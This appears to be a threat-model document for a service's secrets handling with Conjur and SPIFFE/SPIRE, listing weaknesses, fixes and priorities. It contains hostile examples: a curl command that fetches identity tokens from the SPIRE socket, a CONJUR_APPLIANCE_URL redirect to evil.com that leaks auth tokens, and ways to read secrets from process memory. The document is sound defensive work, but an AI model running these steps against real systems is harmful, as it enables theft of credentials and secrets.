Threat Model
Secrets & Identity Threat Model
Section titled “Secrets & Identity Threat Model”Honest assessment of what’s secure, what’s not, and what to fix.
The Catches
Section titled “The Catches”1. CATCH: Env Var Fallback = Silent Downgrade Attack
Section titled “1. CATCH: Env Var Fallback = Silent Downgrade Attack”The problem:
When Conjur is unreachable or doesn’t have a variable, the ConjurBackend silently falls back to os.environ. An attacker who can kill the Conjur connection (network partition, DNS hijack, firewall rule) forces the app to read from env vars — which may be stale, compromised, or attacker-controlled.
# conjur_backend.py line 104-108env_val = os.environ.get(name)if env_val is not None: logger.debug("secret_env_fallback", name=name) # debug level — easy to miss return env_valImpact: If an attacker sets env vars on the host (compromised container, malicious sidecar) AND blocks Conjur, the app uses the attacker’s values.
Fix needed: In production, the fallback should be configurable. Fail-closed mode: if Conjur is configured but unreachable, refuse to return the secret instead of falling back. The debug log level hides this — should be warning at minimum.
2. CATCH: Secrets Live in Process Memory — Unprotected
Section titled “2. CATCH: Secrets Live in Process Memory — Unprotected”The problem:
Every secret fetched from Conjur sits in a Python dict as a plain str. Python strings are immutable and cannot be zeroed out. They live in memory until garbage collected — which may be never for cached values.
# conjur_backend.py — cache is a plain dict of plain stringsself._cache: dict[str, tuple[str, float]] = {}# "sk-ant-api03-..." sits in heap memory, readable via:# - /proc/PID/mem (root)# - gcore PID (core dump)# - ptrace (debugger attach)# - memory forensics after container killImpact: Anyone with root on the host (or a container escape exploit) can read all cached secrets from process memory. A core dump (crash, OOM kill) writes them to disk.
Fix needed:
- Disable core dumps:
ulimit -c 0orprctl(PR_SET_DUMPABLE, 0)at process start. - The cache TTL limits the window (secrets expire from cache after 5 min), but during that window they’re in plaintext memory.
- Python cannot truly zero memory (strings are immutable). For the vault encryption key,
crypto.pycould usemlock()via ctypes to prevent swap, but this is hard in Python.
3. CATCH: SPIRE Agent Socket = Root of Trust, But Who Guards It?
Section titled “3. CATCH: SPIRE Agent Socket = Root of Trust, But Who Guards It?”The problem:
The SPIFFE Workload API socket (/tmp/spire-agent/public/api.sock) is the root of trust. Any process that can open this socket can request a JWT-SVID and authenticate to Conjur as TapPass.
# If an attacker gets shell in the same pod or on the same node:curl --unix-socket /tmp/spire-agent/public/api.sock \ http://localhost/v1/fetch_jwt_svid \ -d '{"audience": ["tappass"]}'# → Gets a valid JWT-SVID → authenticates to Conjur → reads all secretsImpact: Container escape, compromised sidecar, or same-node lateral movement = full secret access.
Mitigation (SPIRE’s responsibility, not ours):
- SPIRE Agent uses kernel attestation (pid, uid, cgroups, K8s pod identity) to verify which workload is requesting the SVID.
- The socket should be mounted read-only into only the TapPass container (K8s volume mount with specific pod selector).
- SPIRE registration entries should be tight: only the specific pod service account + namespace + container image hash gets an SVID.
Our responsibility: Document this clearly. TapPass trusts SPIRE — if SPIRE is misconfigured (loose attestation policies), the whole chain falls apart.
4. CATCH: Conjur Admin Account = God Mode
Section titled “4. CATCH: Conjur Admin Account = God Mode”The problem: Whoever has the Conjur admin API key can read every secret, modify policies, and impersonate any host. This is true for any centralized secrets manager.
Impact: If the Conjur admin credential is compromised, all secrets are compromised.
Mitigation:
- Conjur admin should use MFA (CyberArk PAM).
- Admin API key should be rotated and stored in a break-glass safe.
- Separation of duty: TapPass’s
host/tappass/serveridentity hasreadonly — it cannot modify policies or read secrets outside its policy scope.
5. CATCH: Resolver Auto-Detection Can Be Manipulated
Section titled “5. CATCH: Resolver Auto-Detection Can Be Manipulated”The problem:
The resolver checks os.environ.get("CONJUR_APPLIANCE_URL") to decide which backend to use. If an attacker can set this env var (compromised Dockerfile, CI pipeline injection, K8s configmap edit), they can redirect all secret fetches to a malicious Conjur instance.
if os.environ.get("CONJUR_APPLIANCE_URL"): backend = ConjurBackend() # connects to whatever URL is in the env varImpact: Attacker sets CONJUR_APPLIANCE_URL=https://evil.com → app sends auth tokens to evil.com → evil.com returns fake secrets → app uses attacker-controlled API keys.
Fix needed: In production, the Conjur URL should be validated against an allowlist or pinned in the deployment config (not just any env var). At minimum, the TLS certificate verification (CONJUR_SSL_CERT_PATH) should be mandatory in production — pinning the CA prevents connecting to a rogue server.
6. CATCH: The 5-Minute Rotation Gap
Section titled “6. CATCH: The 5-Minute Rotation Gap”The problem: When a secret is rotated in Conjur (e.g., a leaked API key), TapPass continues using the cached old value for up to 5 minutes (the TTL).
Impact: A 5-minute window where a compromised key is still in use, even after rotation.
Mitigation already in place: POST /admin/secrets/invalidate forces immediate cache flush. But this requires someone (or an automated system) to call it.
Fix needed: Conjur can send webhooks on secret rotation. TapPass should auto-register a webhook listener that calls invalidate() automatically — zero human intervention.
7. CATCH: No Mutual TLS to Conjur
Section titled “7. CATCH: No Mutual TLS to Conjur”The problem: TapPass authenticates to Conjur via JWT (SPIFFE) over one-way TLS. The Conjur server is verified via its certificate, but Conjur doesn’t verify the TLS client certificate. The authentication is at the application layer (JWT in POST body), not at the transport layer.
With mTLS, even if an attacker intercepts the JWT-SVID, they can’t replay it because they don’t have the TLS client certificate.
Fix possible: Use the SPIFFE X509-SVID (which TapPass already has from SPIRE) as the TLS client cert when connecting to Conjur. httpx supports cert=(cert_file, key_file). This adds transport-layer authentication on top of JWT application-layer authentication.
What IS Solid
Section titled “What IS Solid”| Layer | Status | Why |
|---|---|---|
| No secrets in code/config/env | ✅ | 129 callsites go through protocol. Only Conjur connection coordinates in env (not secrets). |
| Automatic rotation pickup | ✅ | TTL cache + invalidation endpoint. No restart needed. |
| Audit trail | ✅ | Conjur logs every secret read with host identity, timestamp, result. |
| No static credential for Conjur auth | ✅ | SPIFFE JWT-SVID from SPIRE. Auto-rotated every 5 min. No API key in production. |
| SPIFFE identity reuse | ✅ | Same SPIRE infrastructure for agent auth AND Conjur auth. Single identity system. |
| Protocol is open | ✅ | Backend is swappable. Conjur today, Vault tomorrow. No lock-in. |
| TLS to Conjur | ✅ | httpx verifies server cert. Never verify=False. CA pinning via CONJUR_SSL_CERT_PATH. |
| Thread safety | ✅ | Single lock protects cache + auth token. All Conjur I/O serialized. |
Prioritized Fix List
Section titled “Prioritized Fix List”| # | Issue | Severity | Effort | Fix |
|---|---|---|---|---|
| 1 | Env fallback in production is silent downgrade | High | Small | Add CONJUR_FAIL_CLOSED=true mode. Log fallbacks at warning not debug. |
| 2 | Conjur URL can be redirected via env var | High | Small | Mandatory CONJUR_SSL_CERT_PATH in production. Validate URL against allowlist. |
| 3 | Core dumps contain secrets in memory | Medium | Small | Disable core dumps at process start. Set RLIMIT_CORE=0. |
| 4 | No mTLS to Conjur | Medium | Medium | Use X509-SVID as httpx client cert for Conjur connections. |
| 5 | 5-min rotation gap | Low | Medium | Conjur webhook → auto-invalidate. |
| 6 | SPIRE socket access = root of trust | Low (SPIRE’s job) | N/A | Document attestation requirements. |
| 7 | Memory secrets can’t be zeroed (Python) | Low | N/A | Language limitation. TTL cache limits window. |